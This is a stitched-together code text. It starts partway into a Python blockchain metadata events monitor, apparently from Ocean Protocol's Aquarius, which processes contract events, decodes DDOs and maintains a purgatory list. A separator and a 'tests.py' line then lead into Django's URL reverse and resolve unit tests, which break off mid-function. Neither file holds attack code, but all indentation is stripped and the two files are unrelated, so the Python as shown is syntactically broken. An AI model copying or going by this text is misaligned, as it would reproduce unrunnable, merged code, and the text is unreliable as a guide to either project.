allowed_publishers = set()
try:
publishers_str = os.getenv("ALLOWED_PUBLISHERS", "")
allowed_publishers = (
set(json.loads(publishers_str)) if publishers_str else set()
)
except (JSONDecodeError, TypeError, Exception) as e:
logger.error(
f"Reading list of allowed publishers failed: {e}\n"
f'ALLOWED_PUBLISHER is set to "{os.getenv("ALLOWED_PUBLISHER")}"'
)
self._allowed_publishers = set(sanitize_addresses(allowed_publishers))
logger.debug(f"allowed publishers: {self._allowed_publishers}")
logger.debug(
f"EventsMonitor: using Metadata contract address {self._contract_address}."
)
self._monitor_is_on = False
default_sleep_time = 10
try:
self._monitor_sleep_time = int(
os.getenv("OCN_EVENTS_MONITOR_QUITE_TIME", default_sleep_time)
)
except ValueError:
self._monitor_sleep_time = default_sleep_time
self._monitor_sleep_time = max(self._monitor_sleep_time, default_sleep_time)
if not self._contract or not self._web3.isAddress(self._contract_address):
logger.error(
f"Contract address {self._contract_address} is not a valid address. Events thread not starting"
)
self._contract = None
self._purgatory_enabled = bool(int(os.getenv("PROCESS_PURGATORY", 1)) == 1)
self._purgatory_list = set()
self._purgatory_update_time = None
@property
def is_monitor_running(self):
return self._monitor_is_on
def start_events_monitor(self):
if self._monitor_is_on:
return
if self._contract_address is None:
logger.error("Cannot start events monitor without a valid contract address")
return
if self._contract is None:
logger.error("Cannot start events monitor without a valid contract object")
return
logger.info(
f"Starting the events monitor on contract {self._contract_address}."
)
t = Thread(target=self.run_monitor, daemon=True)
self._monitor_is_on = True
t.start()
def stop_monitor(self):
self._monitor_is_on = False
if self._pool_monitor and self._pool_monitor.is_running():
self._pool_monitor.stop()
def run_monitor(self):
first_update = bool(
self._pool_monitor and self._pool_monitor.is_first_update_enabled()
)
if self._purgatory_enabled:
self._update_existing_assets_purgatory_data()
while True:
try:
if not self._monitor_is_on:
return
self.process_current_blocks()
self._process_pool_events(first_update)
first_update = False
if self._purgatory_enabled:
self._update_purgatory_list()
except (KeyError, Exception) as e:
logger.error("Error processing event:")
logger.error(e)
time.sleep(self._monitor_sleep_time)
def _process_pool_events(self, first_update=False):
if not self._pool_monitor:
return
if first_update:
self._pool_monitor.do_update()
self._pool_monitor.process_pool_events()
def _update_existing_assets_purgatory_data(self):
for asset in self._oceandb.list():
did = asset.get("id", None)
if not did or not did.startswith("did:op:"):
continue
purgatory = asset.get("isInPurgatory", "false")
if not isinstance(purgatory, str):
purgatory = "true" if purgatory is True else "false"
asset["isInPurgatory"] = purgatory
if "purgatoryData" in asset:
asset.pop("purgatoryData")
try:
self._oceandb.update(json.dumps(asset), did)
except Exception as e:
logger.warning(f"updating ddo {did} purgatory attribute failed: {e}")
@staticmethod
def _get_reference_purgatory_list():
response = requests.get(
"https://raw.githubusercontent.com/oceanprotocol/list-purgatory/main/list-assets.json"
)
if response.status_code != requests.codes.ok:
return set()
return {(a["did"], a["reason"]) for a in response.json() if a and "did" in a}
def _update_purgatory_list(self):
now = int(datetime.now().timestamp())
if self._purgatory_update_time and (now - self._purgatory_update_time) < 3600:
return
self._purgatory_update_time = now
bad_list = self._get_reference_purgatory_list()
if not bad_list:
return
if self._purgatory_list == bad_list:
return
new_ids = bad_list.difference(self._purgatory_list)
self._purgatory_list = bad_list
for _id, reason in new_ids:
try:
asset = self._oceandb.read(_id)
asset["isInPurgatory"] = "true"
if "purgatoryData" in asset:
asset.pop("purgatoryData")
self._oceandb.update(json.dumps(asset), _id)
except Exception:
pass
def process_current_blocks(self):
try:
last_block = self.get_last_processed_block()
except Exception as e:
debug_log(e)
last_block = 0
current_block = self._web3.eth.blockNumber
if (
not current_block
or not isinstance(current_block, int)
or current_block <= last_block
):
return
from_block = last_block
debug_log(
f"Metadata monitor >>>> from_block:{from_block}, current_block:{current_block} <<<<"
)
for event in self.get_event_logs(
EVENT_METADATA_CREATED, from_block, current_block
):
try:
self.processNewDDO(event)
except Exception as e:
logger.error(
f"Error processing new metadata event: {e}\n" f"event={event}"
)
for event in self.get_event_logs(
EVENT_METADATA_UPDATED, from_block, current_block
):
try:
self.processUpdateDDO(event)
except Exception as e:
logger.error(
f"Error processing update metadata event: {e}\n" f"event={event}"
)
self.store_last_processed_block(current_block)
def get_last_processed_block(self):
last_block_record = self._oceandb.driver.es.get(
index=self._other_db_index, id="events_last_block", doc_type="_doc"
)["_source"]
return last_block_record["last_block"]
def store_last_processed_block(self, block):
record = {"last_block": block}
try:
self._oceandb.driver.es.index(
index=self._other_db_index,
id="events_last_block",
body=record,
doc_type="_doc",
refresh="wait_for",
)["_id"]
except elasticsearch.exceptions.RequestError as e:
logger.error(
f"store_last_processed_block: block={block} type={type(block)}, error={e}"
)
def get_event_logs(self, event_name, from_block, to_block):
def _get_logs(event, _from_block, _to_block):
debug_log(f"get_event_logs ({event_name}, {from_block}, {to_block})..")
_filter = event().createFilter(fromBlock=_from_block, toBlock=_to_block)
return _filter.get_all_entries()
try:
logs = _get_logs(
getattr(self._contract.events, event_name), from_block, to_block
)
return logs
except ValueError as e:
logger.error(
f"get_event_logs ({event_name}, {from_block}, {to_block}) failed: {e}.\n Retrying once more."
)
try:
logs = _get_logs(
getattr(self._contract.events, event_name), from_block, to_block
)
return logs
except ValueError as e:
logger.error(
f"get_event_logs ({event_name}, {from_block}, {to_block}) failed: {e}."
)
def is_publisher_allowed(self, publisher_address):
logger.debug(f"checking allowed publishers: {publisher_address}")
if not self._allowed_publishers:
return True
publisher_address = self._web3.toChecksumAddress(publisher_address)
return publisher_address in self._allowed_publishers
def processNewDDO(self, event):
(
did,
block,
txid,
contract_address,
sender_address,
flags,
rawddo,
timestamp,
) = self.get_event_data(event)
logger.info(
f"Process new DDO, did from event log:{did}, sender:{sender_address}"
)
if not self.is_publisher_allowed(sender_address):
logger.warning(f"Sender {sender_address} is not in ALLOWED_PUBLISHERS.")
return
try:
self._oceandb.read(did)
logger.warning(f"{did} is already registered")
return
except Exception:
pass
logger.info(f"Start processing {EVENT_METADATA_CREATED} event: did={did}")
debug_log(
f"block {block}, contract: {contract_address}, Sender: {sender_address} , txid: {txid}"
)
logger.debug(f"decoding with did {did} and flags {flags}")
data = self.decode_ddo(rawddo, flags)
if data is None:
logger.warning(f"Could not decode ddo using flags {flags}")
return
msg, _ = validate_data(data, f"event {EVENT_METADATA_CREATED}")
if msg:
logger.warning(msg)
return
_record = init_new_ddo(data, timestamp)
# this will be used when updating the doo
_record["event"] = dict()
_record["event"]["txid"] = txid
_record["event"]["blockNo"] = block
_record["event"]["from"] = sender_address
_record["event"]["contract"] = contract_address
_record["price"] = {
"datatoken": 0.0,
"ocean": 0.0,
"value": 0.0,
"type": "",
"address": "",
"pools": [],
"isConsumable": "",
}
dt_address = _record.get("dataToken")
assert dt_address == add_0x_prefix(did[len("did:op:") :])
if dt_address:
_record["dataTokenInfo"] = get_datatoken_info(dt_address)
if not is_valid_dict_remote(
get_metadata_from_services(_record["service"])["attributes"]
):
errors = list_errors(
list_errors_dict_remote,
get_metadata_from_services(_record["service"])["attributes"],
)
logger.error(f"New ddo has validation errors: {errors}")
return False
_record["isInPurgatory"] = "false"
try:
record_str = json.dumps(_record)
self._oceandb.write(record_str, did)
_record = json.loads(record_str)
name = _record["service"][0]["attributes"]["main"]["name"]
debug_log(f"DDO saved: did={did}, name={name}, publisher={sender_address}")
logger.info(
f"Done processing {EVENT_METADATA_CREATED} event: did={did}. DDO SAVED TO DB"
)
return True
except (KeyError, Exception) as err:
logger.error(
f"encountered an error while saving the asset data to OceanDB: {str(err)}"
)
return False
def processUpdateDDO(self, event):
(
did,
block,
txid,
contract_address,
sender_address,
flags,
rawddo,
timestamp,
) = self.get_event_data(event)
debug_log(f"Process update DDO, did from event log:{did}")
try:
asset = self._oceandb.read(did)
except Exception:
# TODO: check if this asset was deleted/hidden due to some violation issues
# if so, don't add it again
logger.warning(f"{did} is not registered, will add it as a new DDO.")
self.processNewDDO(event)
return
debug_log(
f"block {block}, contract: {contract_address}, Sender: {sender_address} , txid: {txid}"
)
# do not update if we have the same txid
ddo_txid = asset["event"]["txid"]
if txid == ddo_txid:
logger.warning(
f'asset has the same txid, no need to update: event-txid={txid} <> asset-event-txid={asset["event"]["txid"]}'
)
return
# check block
ddo_block = asset["event"]["blockNo"]
if int(block) <= int(ddo_block):
logger.warning(
f"asset was updated later (block: {ddo_block}) vs transaction block: {block}"
)
return
# check owner
if not compare_eth_addresses(
asset["publicKey"][0]["owner"], sender_address, logger
):
logger.warning("Transaction sender must mach ddo owner")
return
debug_log(f"decoding with did {did} and flags {flags}")
data = self.decode_ddo(rawddo, flags)
if data is None:
logger.warning("Cound not decode ddo")
return
msg, _ = validate_data(data, "event update")
if msg:
logger.error(msg)
return
_record = init_new_ddo(data, timestamp)
# make sure that we do not alter created flag
_record["created"] = asset["created"]
# but we update 'updated'
_record["updated"] = format_timestamp(
datetime.fromtimestamp(timestamp).strftime(DATETIME_FORMAT)
)
_record["event"] = dict()
_record["event"]["txid"] = txid
_record["event"]["blockNo"] = block
_record["event"]["from"] = sender_address
_record["event"]["contract"] = contract_address
if not is_valid_dict_remote(
get_metadata_from_services(_record["service"])["attributes"]
):
errors = list_errors(
list_errors_dict_remote,
get_metadata_from_services(_record["service"])["attributes"],
)
logger.error(f"ddo update has validation errors: {errors}")
return
_record["price"] = asset.get("price", {})
dt_address = _record.get("dataToken")
assert dt_address == add_0x_prefix(did[len("did:op:") :])
if dt_address:
_record["dataTokenInfo"] = get_datatoken_info(dt_address)
_record["isInPurgatory"] = asset.get("isInPurgatory", "false")
try:
self._oceandb.update(json.dumps(_record), did)
logger.info(f"updated DDO saved to db successfully (did={did}).")
return True
except (KeyError, Exception) as err:
logger.error(
f"encountered an error while updating the asset data to OceanDB: {str(err)}"
)
return
def get_event_data(self, event):
tx_id = event.transactionHash.hex()
sender = event.args.get("createdBy", event.args.get("updatedBy"))
blockInfo = self._web3.eth.getBlock(event.blockNumber)
timestamp = blockInfo["timestamp"]
return (
f"did:op:{remove_0x_prefix(event.args.dataToken)}",
event.blockNumber,
tx_id,
event.address,
sender,
event.args.get("flags", None),
event.args.get("data", None),
timestamp,
)
def decode_ddo(self, rawddo, flags):
debug_log(f"flags: {flags}")
# debug_log(f'Before unpack rawddo:{rawddo}')
if len(flags) < 1:
debug_log("Set check_flags to 0!")
check_flags = 0
else:
check_flags = flags[0]
# always start with MSB -> LSB
debug_log(f"checkflags: {check_flags}")
# bit 2: check if ddo is ecies encrypted
if check_flags & 2:
try:
rawddo = self.ecies_decrypt(rawddo)
logger.debug(f"Decrypted to {rawddo}")
except (KeyError, Exception) as err:
logger.error(f"Failed to decrypt: {str(err)}")
# bit 1: check if ddo is lzma compressed
if check_flags & 1:
try:
rawddo = Lzma.decompress(rawddo)
logger.debug(f"Decompressed to {rawddo}")
except (KeyError, Exception) as err:
logger.error(f"Failed to decompress: {str(err)}")
logger.debug(f"After unpack rawddo:{rawddo}")
try:
ddo = json.loads(rawddo)
return ddo
except (KeyError, Exception) as err:
logger.error(f"encountered an error while decoding the ddo: {str(err)}")
return None
def ecies_decrypt(self, rawddo):
if self._ecies_account is not None:
key = eth_keys.KeyAPI.PrivateKey(self._ecies_account.privateKey)
rawddo = ecies.decrypt(key.to_hex(), rawddo)
return rawddo
|
tests.py
|
"""
Unit tests for reverse URL lookups.
"""
import sys
import threading
from admin_scripts.tests import AdminScriptTestCase
from django.conf import settings
from django.contrib.auth.models import User
from django.core.exceptions import ImproperlyConfigured, ViewDoesNotExist
from django.http import (
HttpRequest, HttpResponsePermanentRedirect, HttpResponseRedirect,
)
from django.shortcuts import redirect
from django.test import (
RequestFactory, SimpleTestCase, TestCase, override_settings,
)
from django.test.utils import override_script_prefix
from django.urls import (
NoReverseMatch, Resolver404, ResolverMatch, URLPattern, URLResolver,
get_callable, get_resolver, get_urlconf, include, path, re_path, resolve,
reverse, reverse_lazy,
)
from django.urls.resolvers import RegexPattern
from . import middleware, urlconf_outer, views
from .utils import URLObject
from .views import empty_view
resolve_test_data = (
# These entries are in the format: (path, url_name, app_name, namespace, view_name, func, args, kwargs)
# Simple case
('/normal/42/37/', 'normal-view', '', '', 'normal-view', views.empty_view, (), {'arg1': '42', 'arg2': '37'}),
(
'/view_class/42/37/', 'view-class', '', '', 'view-class', views.view_class_instance, (),
{'arg1': '42', 'arg2': '37'}
),
(
'/included/normal/42/37/', 'inc-normal-view', 'included_namespace_urls',
'included_namespace_urls', 'included_namespace_urls:inc-normal-view',
views.empty_view, (), {'arg1': '42', 'arg2': '37'}
),
(
'/included/view_class/42/37/', 'inc-view-class', 'included_namespace_urls',
'included_namespace_urls', 'included_namespace_urls:inc-view-class',
views.view_class_instance, (), {'arg1': '42', 'arg2': '37'}
),
# Unnamed args are dropped if you have *any* kwargs in a pattern
('/mixed_args/42/37/', 'mixed-args', '', '', 'mixed-args', views.empty_view, (), {'arg2': '37'}),
(
'/included/mixed_args/42/37/', 'inc-mixed-args', 'included_namespace_urls',
'included_namespace_urls', 'included_namespace_urls:inc-mixed-args',
views.empty_view, (), {'arg2': '37'}
),
(
'/included/12/mixed_args/42/37/', 'inc-mixed-args', 'included_namespace_urls',
'included_namespace_urls', 'included_namespace_urls:inc-mixed-args',
views.empty_view, (), {'arg2': '37'}
),
# Unnamed views should have None as the url_name. Regression data for #21157.
(
'/unnamed/normal/42/37/', None, '', '', 'urlpatterns_reverse.views.empty_view', views.empty_view, (),
{'arg1': '42', 'arg2': '37'}
),
(
'/unnamed/view_class/42/37/', None, '', '', 'urlpatterns_reverse.views.ViewClass', views.view_class_instance,
(), {'arg1': '42', 'arg2': '37'}
),
# If you have no kwargs, you get an args list.
('/no_kwargs/42/37/', 'no-kwargs', '', '', 'no-kwargs', views.empty_view, ('42', '37'), {}),
(
'/included/no_kwargs/42/37/', 'inc-no-kwargs', 'included_namespace_urls',
'included_namespace_urls', 'included_namespace_urls:inc-no-kwargs',
views.empty_view, ('42', '37'), {}
),
(
'/included/12/no_kwargs/42/37/', 'inc-no-kwargs', 'included_namespace_urls',
'included_namespace_urls', 'included_namespace_urls:inc-no-kwargs',
views.empty_view, ('12', '42', '37'), {}
),
# Namespaces
(
'/test1/inner/42/37/', 'urlobject-view', 'testapp', 'test-ns1', 'test-ns1:urlobject-view',
views.empty_view, (), {'arg1': '42', 'arg2': '37'}
),
(
'/included/test3/inner/42/37/', 'urlobject-view', 'included_namespace_urls:testapp',
'included_namespace_urls:test-ns3', 'included_namespace_urls:test-ns3:urlobject-view',
views.empty_view, (), {'arg1': '42', 'arg2': '37'}
),
(
'/ns-included1/normal/42/37/', 'inc-normal-view', 'included_namespace_urls',
'inc-ns1', 'inc-ns1:inc-normal-view',
views.empty_view, (), {'arg1': '42', 'arg2': '37'}
),
(
'/included/test3/inner/42/37/', 'urlobject-view', 'included_namespace_urls:testapp',
'included_namespace_urls:test-ns3', 'included_namespace_urls:test-ns3:urlobject-view',
views.empty_view, (), {'arg1': '42', 'arg2': '37'}
),
(
'/default/inner/42/37/', 'urlobject-view', 'testapp', 'testapp', 'testapp:urlobject-view',
views.empty_view, (), {'arg1': '42', 'arg2': '37'}
),
(
'/other2/inner/42/37/', 'urlobject-view', 'nodefault', 'other-ns2', 'other-ns2:urlobject-view',
views.empty_view, (), {'arg1': '42', 'arg2': '37'}
),
(
'/other1/inner/42/37/', 'urlobject-view', 'nodefault', 'other-ns1', 'other-ns1:urlobject-view',
views.empty_view, (), {'arg1': '42', 'arg2': '37'}
),
# Nested namespaces
(
'/ns-included1/test3/inner/42/37/', 'urlobject-view', 'included_namespace_urls:testapp',
'inc-ns1:test-ns3', 'inc-ns1:test-ns3:urlobject-view',
views.empty_view, (), {'arg1': '42', 'arg2': '37'}
),
(
'/ns-included1/ns-included4/ns-included2/test3/inner/42/37/', 'urlobject-view',
'included_namespace_urls:namespace_urls:included_namespace_urls:testapp',
'inc-ns1:inc-ns4:inc-ns2:test-ns3',
'inc-ns1:inc-ns4:inc-ns2:test-ns3:urlobject-view',
views.empty_view, (), {'arg1': '42', 'arg2': '37'}
),
(
'/app-included/test3/inner/42/37/', 'urlobject-view', 'included_namespace_urls:testapp', 'inc-app:test-ns3',
'inc-app:test-ns3:urlobject-view', views.empty_view, (), {'arg1': '42', 'arg2': '37'}
),
(
'/app-included/ns-included4/ns-included2/test3/inner/42/37/', 'urlobject-view',
'included_namespace_urls:namespace_urls:included_namespace_urls:testapp',
'inc-app:inc-ns4:inc-ns2:test-ns3',
'inc-app:inc-ns4:inc-ns2:test-ns3:urlobject-view',
views.empty_view, (), {'arg1': '42', 'arg2': '37'}
),
# Namespaces capturing variables
(
'/inc70/', 'inner-nothing', 'included_urls', 'inc-ns5', 'inc-ns5:inner-nothing',
views.empty_view, (), {'outer': '70'}
),
(
'/inc78/extra/foobar/', 'inner-extra', 'included_urls', 'inc-ns5', 'inc-ns5:inner-extra',
views.empty_view, (), {'outer': '78', 'extra': 'foobar'}
),
)
test_data = (
('places', '/places/3/', [3], {}),
('places', '/places/3/', ['3'], {}),
('places', NoReverseMatch, ['a'], {}),
('places', NoReverseMatch, [], {}),
('places?', '/place/', [], {}),
('places+', '/places/', [], {}),
('places*', '/place/', [], {}),
('places2?', '/', [], {}),
('places2+', '/places/', [], {}),
('places2*', '/', [], {}),
('places3', '/places/4/', [4], {}),
('places3', '/places/harlem/', ['harlem'], {}),
('places3', NoReverseMatch, ['harlem64'], {}),
('places4', '/places/3/', [], {'id': 3}),
('people', NoReverseMatch, [], {}),
('people', '/people/adrian/', ['adrian'], {}),
('people', '/people/adrian/', [], {'name': 'adrian'}),
('people', NoReverseMatch, ['name with spaces'], {}),
('people', NoReverseMatch, [], {'name': 'name with spaces'}),
('people2', '/people/name/', [], {}),
('people2a', '/people/name/fred/', ['fred'], {}),
('people_backref', '/people/nate-nate/', ['nate'], {}),
('people_backref', '/people/nate-nate/', [], {'name': 'nate'}),
('optional', '/optional/fred/', [], {'name': 'fred'}),
('optional', '/optional/fred/', ['fred'], {}),
('named_optional', '/optional/1/', [1], {}),
('named_optional', '/optional/1/', [], {'arg1': 1}),
('named_optional', '/optional/1/2/', [1, 2], {}),
('named_optional', '/optional/1/2/', [], {'arg1': 1, 'arg2': 2}),
('named_optional_terminated', '/optional/1/', [1], {}),
('named_optional_terminated', '/optional/1/', [], {'arg1': 1}),
('named_optional_terminated', '/optional/1/2/', [1, 2], {}),
('named_optional_terminated', '/optional/1/2/', [], {'arg1': 1, 'arg2': 2}),
('hardcoded', '/hardcoded/', [], {}),
('hardcoded2', '/hardcoded/doc.pdf', [], {}),
('people3', '/people/il/adrian/', [], {'state': 'il', 'name': 'adrian'}),
('people3', NoReverseMatch, [], {'state': 'il'}),
('people3', NoReverseMatch, [], {'name': 'adrian'}),
('people4', NoReverseMatch, [], {'state': 'il', 'name': 'adrian'}),
('people6', '/people/il/test/adrian/', ['il/test', 'adrian'], {}),
('people6', '/people//adrian/', ['adrian'], {}),
('range', '/character_set/a/', [], {}),
('range2', '/character_set/x/', [], {}),
('price', '/price/$10/', ['10'], {}),
('price2', '/price/$10/', ['10'], {}),
('price3', '/price/$10/', ['10'], {}),
('product', '/product/chocolate+($2.00)/', [], {'price': '2.00', 'product': 'chocolate'}),
('headlines', '/headlines/2007.5.21/', [], {'year': 2007, 'month': 5, 'day': 21}),
(
'windows', r'/windows_path/C:%5CDocuments%20and%20Settings%5Cspam/', [],
{'drive_name': 'C', 'path': r'Documents and Settings\spam'}
),
('special', r'/special_chars/~@+%5C$*%7C/', [r'~@+\$*|'], {}),
('special', r'/special_chars/some%20resource/', [r'some resource'], {}),
('special', r'/special_chars/10%25%20complete/', [r'10% complete'], {}),
('special', r'/special_chars/some%20resource/', [], {'chars': r'some resource'}),
('special', r'/special_chars/10%25%20complete/', [], {'chars': r'10% complete'}),
('special', NoReverseMatch, [''], {}),
('mixed', '/john/0/', [], {'name': 'john'}),
('repeats', '/repeats/a/', [], {}),
('repeats2', '/repeats/aa/', [], {}),
('repeats3', '/repeats/aa/', [], {}),
('test', '/test/1', [], {}),
('inner-nothing', '/outer/42/', [], {'outer': '42'}),
('inner-nothing', '/outer/42/', ['42'], {}),
('inner-nothing', NoReverseMatch, ['foo'], {}),
('inner-extra', '/outer/42/extra/inner/', [], {'extra': 'inner', 'outer': '42'}),
('inner-extra', '/outer/42/extra/inner/', ['42', 'inner'], {}),
('inner-extra', NoReverseMatch, ['fred', 'inner'], {}),
('inner-no-kwargs', '/outer-no-kwargs/42/inner-no-kwargs/1/', ['42', '1'], {}),
('disjunction', NoReverseMatch, ['foo'], {}),
('inner-disjunction', NoReverseMatch, ['10', '11'], {}),
('extra-places', '/e-places/10/', ['10'], {}),
('extra-people', '/e-people/fred/', ['fred'], {}),
('extra-people', '/e-people/fred/', [], {'name': 'fred'}),
('part', '/part/one/', [], {'value': 'one'}),
('part', '/prefix/xx/part/one/', [], {'value': 'one', 'prefix': 'xx'}),
('part2', '/part2/one/', [], {'value': 'one'}),
('part2', '/part2/', [], {}),
('part2', '/prefix/xx/part2/one/', [], {'value': 'one', 'prefix': 'xx'}),
('part2', '/prefix/xx/part2/', [], {'prefix': 'xx'}),
# Tests for nested groups. Nested capturing groups will only work if you
# *only* supply the correct outer group.
('nested-noncapture', '/nested/noncapture/opt', [], {'p': 'opt'}),
('nested-capture', '/nested/capture/opt/', ['opt/'], {}),
('nested-capture', NoReverseMatch, [], {'p': 'opt'}),
('nested-mixedcapture', '/nested/capture/mixed/opt', ['opt'], {}),
('nested-mixedcapture', NoReverseMatch, [], {'p': 'opt'}),
('nested-namedcapture', '/nested/capture/named/opt/', [], {'outer': 'opt/'}),
('nested-namedcapture', NoReverseMatch, [], {'outer': 'opt/', 'inner': 'opt'}),
('nested-namedcapture', NoReverseMatch, [], {'inner': 'opt'}),
('non_path_include', '/includes/non_path_include/', [], {}),
# Tests for #13154
('defaults', '/defaults_view1/3/', [], {'arg1': 3, 'arg2': 1}),
('defaults', '/defaults_view2/3/', [], {'arg1': 3, 'arg2': 2}),
('defaults', NoReverseMatch, [], {'arg1': 3, 'arg2': 3}),
('defaults', NoReverseMatch, [], {'arg2': 1}),
# Security tests
('security', '/%2Fexample.com/security/', ['/example.com'], {}),
)
@override_settings(ROOT_URLCONF='urlpatterns_reverse.no_urls')
class NoURLPatternsTests(SimpleTestCase):
def test_no_urls_exception(self):
"""
URLResolver should raise an exception when no urlpatterns exist.
"""
resolver = URLResolver(RegexPattern(r'^$'), settings.ROOT_URLCONF)
with self.assertRaisesMessage(
ImproperlyConfigured,
"The included URLconf 'urlpatterns_reverse.no_urls' does not "
"appear to have any patterns in it. If you see the 'urlpatterns' "
"variable with valid patterns in the file then the issue is "
"probably caused by a circular import."
):
getattr(resolver, 'url_patterns')
@override_settings(ROOT_URLCONF='urlpatterns_reverse.urls')
class URLPatternReverse(SimpleTestCase):
def test_urlpattern_reverse(self):
for name, expected, args, kwargs in test_data:
with self.subTest(name=name, args=args, kwargs=kwargs):
try:
got = reverse(name, args=args, kwargs=kwargs)
except NoReverseMatch:
self.assertEqual(NoReverseMatch, expected)
else:
self.assertEqual(got, expected)
def test_reverse_none(self):
# Reversing None should raise an error, not return the last un-named view.
with self.assertRaises(NoReverseMatch):
reverse(None)
def test_mixing_args_and_kwargs(self):
msg = "Don't mix *args and **kwargs in call to reverse()!"
with self.assertRaisesMessage(ValueError, msg):
reverse('name', args=['a'], kwargs={'b': 'c'})
@override_script_prefix('/{{invalid}}/')
def test_prefix_braces(self):
self.assertEqual(
'/%7B%7Binvalid%7D%7D/includes/non_path_include/',
reverse('non_path_include')
)
def test_prefix_parenthesis(self):
# Parentheses are allowed and should not cause errors or be escaped
with override_script_prefix('/bogus)/'):
self.assertEqual(
'/bogus)/includes/non_path_include/',
reverse('non_path_include')
)
with override_script_prefix('/(bogus)/'):
self.assertEqual(
'/(bogus)/includes/non_path_include/',
reverse('non_path_include')
)
@override_script_prefix('/bump%20map/')
def test_prefix_format_char(self):
self.assertEqual(
'/bump%2520map/includes/non_path_include/',
reverse('non_path_include')
)
@override_script_prefix('/%7Eme/')
def test_non_urlsafe_prefix_with_args(self):
# Regression for #20022, adjusted for #24013 because ~ is an unreserved
# character. Tests whether % is escaped.
self.assertEqual('/%257Eme/places/1/', reverse('places', args=[1]))
def test_patterns_reported(self):
# Regression for #17076
with self.assertRaisesMessage(NoReverseMatch, r"1 pattern(s) tried: ['people/(?P<name>\\w+)/$']"):
# this url exists, but requires an argument
reverse("people", args=[])
@override_script_prefix('/script:name/')
def test_script_name_escaping(self):
self.assertEqual(
reverse('optional', args=['foo:bar']),
'/script:name/optional/foo:bar/'
)
def test_view_not_found_message(self):
msg = (
"Reverse for 'nonexistent-view' not found. 'nonexistent-view' "
"is not a valid view function or pattern name."
)
with self.assertRaisesMessage(NoReverseMatch, msg):
reverse('nonexistent-view')
def test_no_args_message(self):
msg = "Reverse for 'places' with no arguments not found. 1 pattern(s) tried:"
with self.assertRaisesMessage(NoReverseMatch, msg):
reverse('places')
def test_illegal_args_message(self):
msg = "Reverse for 'places' with arguments '(1, 2)' not found. 1 pattern(s) tried:"
with self.assertRaisesMessage(NoReverseMatch, msg):
reverse('places', args=(1, 2))
def test_illegal_kwargs_message(self):
msg = "Reverse for 'places' with keyword arguments '{'arg1': 2}' not found. 1 pattern(s) tried:"
with self.assertRaisesMessage(NoReverseMatch, msg):
reverse('places', kwargs={'arg1': 2})
class ResolverTests(SimpleTestCase):
def test_resolver_repr(self):
"""
Test repr of URLResolver, especially when urlconf_name is a list
(#17892).
"""
# Pick a resolver from a namespaced URLconf
resolver = get_resolver('urlpatterns_reverse.namespace_urls')
sub_resolver = resolver.namespace_dict['test-ns1'][1]
self.assertIn('<URLPattern list>', repr(sub_resolver))
def test_reverse_lazy_object_coercion_by_resolve(self):
"""
Verifies lazy object returned by reverse_lazy is coerced to
text by resolve(). Previous to #21043, this would raise a TypeError.
"""
urls = 'urlpatterns_reverse.named_urls'
proxy_url = reverse_lazy('named-url1', urlconf=urls)
resolver = get_resolver(urls)
resolver.resolve(proxy_url)
def test_resolver_reverse(self):
resolver = get_resolver('urlpatterns_reverse.named_urls')
test_urls = [
# (name, args, kwargs, expected)
('named-url1', (), {}, ''),
('named-url2', ('arg',), {}, 'extra/arg/'),
('named-url2', (), {'extra': 'arg'}, 'extra/arg/'),
]
for name, args, kwargs, expected in test_urls:
with self.subTest(name=name, args=args, kwargs=kwargs):
self.assertEqual(resolver.reverse(name, *args, **kwargs), expected)
def test_resolver_reverse_conflict(self):
"""
URL pattern name arguments don't need to be unique. The last registered
pattern takes precedence for conflicting names.
"""
resolver = get_resolver('urlpatterns_reverse.named_urls_conflict')
test_urls = [
# (name, args, kwargs, expected)
# Without arguments, the last URL in urlpatterns has precedence.
('name-conflict', (), {}, 'conflict/'),
# With an arg, the last URL in urlpatterns has precedence.
('name-conflict', ('arg',), {}, 'conflict-last/arg/'),
# With a kwarg, other URL patterns can be reversed.
('name-conflict', (), {'first': 'arg'}, 'conflict-first/arg/'),
('name-conflict', (), {'middle': 'arg'}, 'conflict-middle/arg/'),
('name-conflict', (), {'last': 'arg'}, 'conflict-last/arg/'),
# The number and order of the arguments don't interfere with reversing.
('name-conflict', ('arg', 'arg'), {}, 'conflict/arg/arg/'),
]
for name, args, kwargs, expected in test_urls:
with self.subTest(name=name, args=args, kwargs=kwargs):
self.assertEqual(resolver.reverse(name, *args, **kwargs), expected)
def test_non_regex(self):
"""
A Resolver404 is raised if resolving doesn't meet the basic
requirements of a path to match - i.e., at the very least, it matches
the root pattern '^/'. Never return None from resolve() to prevent a
TypeError from occurring later (#10834).
"""
test_urls = ['', 'a', '\\', '.']
for path_ in test_urls:
with self.subTest(path=path_):
with self.assertRaises(Resolver404):
resolve(path_)
def test_404_tried_urls_have_names(self):
"""
The list of URLs that come back from a Resolver404 exception contains
a list in the right format for printing out in the DEBUG 404 page with
both the patterns and URL names, if available.
"""
urls = 'urlpatterns_reverse.named_urls'
# this list matches the expected URL types and names returned when
# you try to resolve a nonexistent URL in the first level of included
# URLs in named_urls.py (e.g., '/included/nonexistent-url')
url_types_names = [
[{'type': URLPattern, 'name': 'named-url1'}],
[{'type': URLPattern, 'name': 'named-url2'}],
[{'type': URLPattern, 'name': None}],
[{'type': URLResolver}, {'type': URLPattern, 'name': 'named-url3'}],
[{'type': URLResolver}, {'type': URLPattern, 'name': 'named-url4'}],
[{'type': URLResolver}, {'type': URLPattern, 'name': None}],
[{'type': URLResolver}, {'type': URLResolver}],
]
with self.assertRaisesMessage(Resolver404, 'tried') as cm:
resolve('/included/nonexistent-url', urlconf=urls)
e = cm.exception
# make sure we at least matched the root ('/') url resolver:
self.assertIn('tried', e.args[0])
self.assertEqual(
len(e.args[0]['tried']),
len(url_types_names),
'Wrong number of tried URLs returned. Expected %s, got %s.' % (
len(url_types_names), len(e.args[0]['tried'])
)
)
for tried, expected in zip(e.args[0]['tried'], url_types_names):
for t, e in zip(tried, expected):
with self.subTest(t):
self.assertIsInstance(t, e['type']), '%s is not an instance of %s' % (t, e['type'])
if 'name' in e:
if not e['name']:
self.assertIsNone(t.name, 'Expected no URL name but found %s.' % t.name)
else:
self.assertEqual(
t.name,
e['name'],
'Wrong URL name. Expected "%s", got "%s".' % (e['name'], t.name)
)
def test_namespaced_view_detail(self):
resolver = get_resolver('urlpatterns_reverse.nested_urls')
self.assertTrue(resolver._is_callback('urlpatterns_reverse.nested_urls.view1'))
self.assertTrue(resolver._is_callback('urlpatterns_reverse.nested_urls.view2'))
self.assertTrue(resolver._is_callback('urlpatterns_reverse.nested_urls.View3'))
self.assertFalse(resolver._is_callback('urlpatterns_reverse.nested_urls.blub'))
def test_view_detail_as_method(self):
# Views which have a class name as part of their path.
resolver = get_resolver('urlpatterns_reverse.method_view_urls')
